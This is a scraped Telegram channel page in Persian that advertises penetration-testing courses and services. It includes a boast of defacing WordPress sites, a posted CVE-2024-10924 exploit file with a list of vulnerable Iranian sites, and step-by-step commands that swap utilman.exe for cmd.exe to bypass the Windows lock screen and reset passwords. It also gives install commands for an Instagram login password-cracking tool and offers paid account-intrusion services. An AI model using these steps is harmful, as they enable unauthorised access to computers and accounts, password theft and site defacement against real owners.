ℤ𝕖𝕣𝕠 𝔹𝕪𝕥𝕖
292 subscribers
3 photos
2 videos
3 files
4 links
Привет @durov
Этот канал не нарушает закон.
И в нем нет порнографических и грубых постов. пожалуйста, обратите внимание Официальный канал в @Telegram Без спама
GAP: https://t.me/+FrpGWOGd4GJmNzY8
PV: @er403url
PV: @wesker_07
Download Telegram
⚡️ Zero Byte چیست؟ 🗿

یه کانال که:

1. 🟥 تست نفوذ و امنیت تهاجمی آموزش میده.

2. 🟦 فارنزیک و امنیت دفاعی و Hardening آموزش میده.

3. 🟪 خدمات و پروژه های مختلف از جمله:

🔹 خدمات تست نفوذ قانونی روی سایت و سیستم عامل و سامانه ها و سرور ها و زیرساخت های مختلف

🔹 خدمات ایمن سازی سیستم ها و سامانه ها و شبکه و بررسی تنظیمات امنیتی

🔹 خدمات Hardening

🔹 خدمات حفظ حریم خصوصی دیجیتالی در پلتفرم های مختلف

🔹 خدمات ریپورت قانونی و بن کردن در پلتفرم های مختلف

🔹 خدمات آموزشی همراه با پکیج های آموزشی با قیمت مناسب

🔹 خدمات برنامه نویسی و اسکریپت نویسی و ابزار نویسی قانونی

🔹 خدمات طراحی سایت ایمن در برابر انواع آسیب‌پذیری ها

🔹 خدمات مهندسی معکوس و کرک فایل و نرم افزار

🔹 خدمات اکسپلویت نویسی برای انواع آسیب‌پذیری ها

🔹 خدمات OSINT و جمع‌آوری اطلاعات

🔹️ خدمات ساخت ربات از صفر

🔹️ خدمات نوشتن انواع و اقسام Payload

🔹️ خدمات کمک و راهنمایی در باگ بانتی و تست نفوذ و حملات مختلف

👉 @ZeroByteCyberLab

📩 PV:
👤 @wesker_07
👤 @er403url
🔥43
بریم واسه شروع آموزش مفاهیم تست نفوذ وب؟
10👍5
🛡️ خب بریم سراغ پکیج ابزار های اصلی و واجب (Essentials) برای شروع تست نفوذ وب و وبسایت و وب اپلیکیشن:

1️⃣ Burp Suite Professional

عملا مهمترین و اصلی ترین و اساسی ترین ابزار تست نفوذ وب هست که کار اصلیش تحلیل و بررسی و در صورت لزوم ایجاد تغییر در Request ها و Response ها می باشد.

نسخه رایگان هم داره ولی بیشتر برای تمرین و یادگیری خوبه و خیلی برای کار جدی و عملی مناسب نیست.
2️⃣ OWASP Zap

یه اسکنر فوق‌العاده قدرتمند برای وب و یه پروکسی قدرتمند برای تحلیل و بررسی و دستکاری Request ها و Response ها اما هنوز به قدرت و اهمیت Burp Suite Professional نمیرسه.
3️⃣ Browser DevTools

(مجموعه ابزار داخلی مرورگر)

این همون بخشی هست که داخل مرورگر وقتی راست کلیک میکنیم و Inspect رو میزنیم یا وقتی F12 میزنیم (بسته به مرورگر) ظاهر میشه و امکانات زیادی هم داره مثل کوکی ها، بررسی درخواست های شبکه، ذخیره‌سازی، JavaScript و رفتار برنامه وب.
4️⃣ Nmap

مهم ترین ابزار برای شناسایی و Reconnaissance روی شبکه هست که برای کشف پورت های باز، سرویس ها و نسخه نرم‌افزارهای درحال اجرا روی سیستم هدف استفاده میشود.
5️⃣ ffuf

ابزار سریع فازینگ برای کشف مسیرها، فایل ها، پارامترها، زیردامنه ها و سایر منابع پنهان وب.
6️⃣ Subfinder

ابزاری برای شناسایی و پیدا کردن زیردامنه ها
7️⃣ httpx

ابزاری برای بررسی و شناسایی سرویس های HTTP/HTTPS فعال و استخراج اطلاعات پایه از وب‌سرورها
8️⃣ Nuclei

اسکنر قدرتمند مبتنی بر قالب و بدون محیط گرافیکی
9️⃣ SQLmap

ابزار خودکار تخصصی برای شناسایی و بهره‌برداری از انواع آسیب‌پذیری های SQL Injection در برنامه های وب
🔟 Postman / Insomnia

ابزار هایی برای ساخت، ارسال و مدیریت درخواست های API و بررسی رفتار بعضی از سرویس های وب
📌 این لیست صرفا اساسی ترین و اصلی ترین و مهم ترین ابزارهای تست نفوذ وب هست درحالیکه یه متخصص تست نفوذ وب و کسی که باگ بانتی جدی کار میکند از تعداد خیلی خیلی زیادی ابزار های مختلف و متنوع و تخصصی و حتی دست نویس و اسکریپت های تخصصی و دست نویس اختصاصی و هوش مصنوعی های تخصصی و Cheat Sheet هایی مثل PayloadsAllTheThings استفاده میکند.

🎓 نحوه استفاده دقیق و کامل از هر یک از ابزارها در آینده بصورت کامل و جامع آموزش داده خواهد شد.

@ZeroByteCyberLab


سوالات و پشتیبانی:

@wesker_07
5🔥3
👨‍💻 بریم سراغ اولین پکیج آموزشی:

آموزش کامل تمام انواع آسیب پذیری های وب و نحوه پیدا کردن آنها با استفاده از ابزار Burp Suite Professional و ابزارهای تخصصی دیگه به همراه Lab های تخصصی.😎
👨‍💻 جهت اطلاع از قیمت، خرید و ثبت سفارش به پیوی مراجعه کنید:
@wesker_07


@ZeroByteCyberLab
4
👨‍💻 یه چالش جذاب میخوام بزارم با جایزه ۳۰۰ هزارتومانی همراه با یک هفته اشتراک رایگان به قید قرعه.🔥
👨‍💻 مهمترین زبان برای نوشتن کد مخرب (Exploit) در سیستم عامل ویندوز کدومه؟😶‍🌫️
زمان شرکت در چالش فقط ۲۴ ساعته.🗿
Final Results
21%
Assembly x86_64
14%
Assembly ARM
35%
C
30%
C++
3👎3🔥2
میخاوم یه ابزار براتون بزارم برا دیفیس سایت های وردپرس دارای افزونه ی پروفایل بیلدر من قبلاً چند تا سایت دیفیس کرده بودم باهاش یکیش هم سایت ملی گاز استان قزوین بود
1
ℤ𝕖𝕣𝕠 𝔹𝕪𝕥𝕖
CVE-2024-10924.py
اینا هستن با داشتن یوزر نیم ادمین میتونید پسوردش رو چنج بزنید کد رو بخونید متوجه میشید
1
ℤ𝕖𝕣𝕠 𝔹𝕪𝕥𝕖
IR.json
اینم لیست سایت های ایرانی که این آسیب پذیری رو دارن البته قدیم شخم زدمشون ولی خب
1
یه گپ هم میزنم برای سوالاتتون و چت
1
👨‍💻 یه چالش خفن و جایزه دار داریم واسه مهندسین معکوس عزیز.🔥

👨‍💻 فایلی که براتون اینجا قرار میدم یه فایل کرک می نسبتا ساده با فرمت exe هست که خودم نوشتمش و چالش فراتر از یه تحلیل و کرک ساده هست.😈

👨‍💻 این نرم افزار رو شما زمانی که در ویندوز اجرا میکنید یه یوزرنیم و یه پسورد ازتون میخواد و پسوردی که برنامه از شما قبول میکنه طبق یه الگوی خاصی از روی یوزرنیم شما ساخته و پذیرفته میشود.☠️

🟥 قوانین چالش:

1️⃣ تحلیل رفتار برنتمه و پیدا کردن الگوریتم ساخت پسورد از روی یوزرنیم و ارسال کد C دقیق مربوطه در پیوی و درصورت تایید: 10 امتیاز😃

2️⃣ کرک فایل نرم افزار به شکلی که نرم افزار هر پسوردی رو قبول کنه و به راحتی با هر پسورد و هر یوزرنیمی وارد بشیم و ارسال فایل کرک شده در پیوی و درصورت تایید: 20 امتیاز😎

3️⃣ نوشتن Keygen برای برنامه و ارسال فایل Keygen در پیوی و درصورت تایید: 30 امتیاز😈

4️⃣ تغییر کامل ظاهر برنامه به طوری که هنگام اجرا نام شمارو نمایش بده و ایجاد تغییر کامل در رفتار و منطق برنامه و ارسال فایل کرک شده در پیوی و درصورت تایید: 40 امتیاز☠️

👨‍💻 زمان شرکت در این چالش فقط یک هفته میباشد و پس پایان فرصت شرکت در این چالش کسی که بیشترین امتیاز رو کسب کرده باشه برنده جایزه ویژه 1 میلیون تومانی خواهد شد.🔥

👨‍💻 برای شرکت در چالش و ارسال فایل یا درصورت وجود هرگونه سوال یا مشکلی یا درخواست هرگونه خدمات مهندسی معکوس و تحلیل و کرک فایل و نرم افزار و حتی بدافزار به پیوی مراجعه کنید:
@wesker_07


👨‍💻 درصورت نیاز به راه حل گام به گام دقیق و ویدیویی این چالش و کرک آن تنها با ابزار x64dbg به پیوی زیر مراجعه کنید اما توجه داشته باشید به محض دریافت راه حل ویدیویی یا هرگونه کمک و راهنمایی بلافاصله آیدی شما از لیست رقابت کنندگان و شرکت کنندگان حذف خواهد شد.🗿

@wesker_07


@ZeroByteCyberLab
🔥3👏2
ℤ𝕖𝕣𝕠 𝔹𝕪𝕥𝕖
Wesker CrackMe.zip
فایل چالش🔥

👨‍💻 دقت داشته باشید حتما روی ویندوز اجرا کرده و ابتدا فایل را از حالت zip خارج کرده و سپس فایل exe اصلی را اجرا و فرآیند مهندسی معکوس و کرک را شروع کنید.🗿

👨‍💻 موفق باشید عزیزان.🫶
🔥3👏1
👨‍💻 آموزش دور زدن قفل لاک اسکرین ویندوز کی میخواد ویدیویی دقیق آموزش بدم؟🗿

👨‍💻 ریکشن های این پست به 20 تا برسه آموزششو میزارم به همراه 3 تا ابزار تخصصی نفوذ و Exploitation برای ویندوز.🕶

@ZeroByteCyberLab
👎6630👍4🔥1👏1
👨‍💻 خب بریم تو کارش.😈

👨‍💻 آموزش دقیق و مرحله به مرحله دور زدن قفل لاک اسکرین ویندوز 10 و 11 تمام ورژن ها.☠️

🟥 توجه: درصورتی که ویندوز شما یا هدف از قابلیت BitLocker استفاده کند و این گزینه فعال باشد این تکنیک به هیچ عنوان کار نمیکند.🗿

1️⃣ مرحله اول:

👨‍💻 در‌صفحه لاک اسکرین ویندوز پایین سمت راست یه آدمک هست که وقتی روش کلیک میکنید درحالت عادی تعدادی ابزار های دسترسی پذیری برای شما میاره و اسم این پکیج یا سرویس در ویندوز utilman.exe هست و خودش یک آسیب پذیری هم هست برای گرفتن CMD از System32.😶‍🌫️

👨‍💻 برای ورود به Windows Recovery Environment (WinRE) فقط کافیست کلید SHIFT را نگه داشته و همزمان Restart را از گوشه سمت راست پایین بزنیم و سپس وارد محیط ریکاوری میشیم.🗿

2️⃣ مرحله دوم:

👨‍💻 این مسیر رو میریم:
Troubleshooting
👇
Advanced Options
👇
Command Prompt


3️⃣ مرحله سوم:

👨‍💻 دستورات زیر را به ترتیب در خط فرمان وارد میکنیم:
cd ..

cd ..

C:

cd Windows/System32

copy utilman.exe utilman.bak

copy cmd.exe utilman.exe

👨‍💻 بعد از آخرین دستور عبارت yes را تایپ کرده و Enter میزنیم و سپس از خط فرمان خارج شده و Exit and continue to Windows 11 رو میزنیم.🗿

4️⃣ مرحله چهارم:

👨‍💻 بعد از ورود مجدد به صفحه لاک اسکرین ویندوز مجدد از قسمت پایین سمت راست عکس آدمک رو انتخاب اما این دفعه یک CMD با دسترسی System اجرا میشود و به راحتی میتوان از آن برای تغییر رمز عبور استفاده کرد.😈

👨‍💻 دستورات زیر را به ترتیب در خط فرمان وارد میکنیم:
net user

👨‍💻 بعد از این دستور نام دقیق و کامل یوزر اصلی رو شناسایی کرده و سپس از آن در دستور بعدی استفاده میکنیم.
net user "Your Username" Password

👨‍💻 دقت داشته باشید اسم کامل یوزرنیم باید داخل دابل کوتیشن قرار بگیرد و حروف بزرگ و کوچک و فاصله ها دقیق رعایت شود و سپس پسورد دلخواه را وارد کرده و به راحتی میتوان هر پسوردی وارد کرد و سپس از همان پسورد وارد شده به عنوان پسورد اصلی برای ورود و دور زدن لاک اسکرین استفاده کرد.☠️

🔷️ مثال:
net user "John Smith" 123 و سپس Enter
👨‍💻 برای مثال در این دستور نام یوزر اصلی John Smith بوده که داخل دابل کوت قرار گرفته و سپس پسورد دلخواه را وارد میکنیم و تمام.💪

👨‍💻 درصورت وجود هرگونه سوال یا مشکلی یا انجام این خدمات یا آموزش ویدیویی مرحله به مرحله به پیوی مراجعه کنید:
@wesker_07


@ZeroByteCyberLab
🔥2
👨‍💻 دستورات مرحله به مرحله برای نصب ابزار IGHack روی Termux و Kali Linux برای تست نفوذ و کرک پسورد روی صفحه لاگین اینستاگرام.☠️
apt-get update -y

apt-get upgrade -y

pkg install python -y

pkg install python2 -y

pkg install git -y

pip install lolcat

git clone https://github.com/noob-hackers/ighack

ls

cd ighack

ls

bash setup

bash ighack.sh

👨‍💻 برای کاربرد و نحوه استفاده دقیق و مرحله به مرحله ویدیویی قانونی از این ابزار یا برای هرگونه خدمات نفوذ به اینستاگرام و بقیه پلتفرم ها به پیوی مراجعه کنید:
@wesker_07


@ZeroByteCyberLab
🔥2👏1